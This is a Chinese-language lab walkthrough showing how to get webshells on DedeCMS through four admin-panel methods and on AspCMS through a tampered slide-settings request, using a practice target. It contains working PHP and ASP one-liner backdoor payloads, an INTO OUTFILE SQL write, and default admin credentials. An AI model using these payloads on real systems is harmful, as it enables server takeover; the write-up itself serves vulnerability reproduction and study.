dedecms(四种webshell姿势)aspcms webshell漏洞复现
dedecms
我们首先访问靶场
姿势1上传文件getshell
首先登录后台
点击文件管理器》文件上传
写一个php一句话木马文件
然后进行上传
点击上传之后提示上传成功并且目录里也显示了我们刚刚上传的文件,并且最上面有显示文件的路径
然后我们进行访问并连接
连接成功
姿势2 修改模版文件getshell
点击模版找到index.html 并点击修改
在代码的开头写入php一句话木马,点击保存
然后返回点击生成,修改网页为静态网页
然后进行访问
并连接
姿势3后台任意命令执行getshell
模块》广告管理》增加一个新广告
在广告内容里写入一句话木马
然后点击代码在,里面找到文件的路径
访问并连接
姿势4 sql命令执行写入php木马getshell
点击系统》sql命令执行工具》写入payload
select '<?php @eval($_POST[cmd]);?>' into outfile "D:/phpstudy_pro/www/dedecms/2.php"
然后直接访问我们写入的2.php文件并进行连接
aspcms
访问网站出现报错
说明浏览器不会给我们自动访问index网页,那么我们在url后面加上index.asp再进行访问
访问后台管理页面,并使用账号密码登录
admin 123456
然后点击扩展》幻灯片设置》点击保存时进行抓包
在抓取的数据包中修改 slideTextstatus 字段的值为以下代码并进行发包查看被修改的asp
文件内容
1%25><%25Eval(Request(chr(65)))%25><%25 密码为a
然后进行访问并进行连接
使用菜刀进行连接,并成功getshell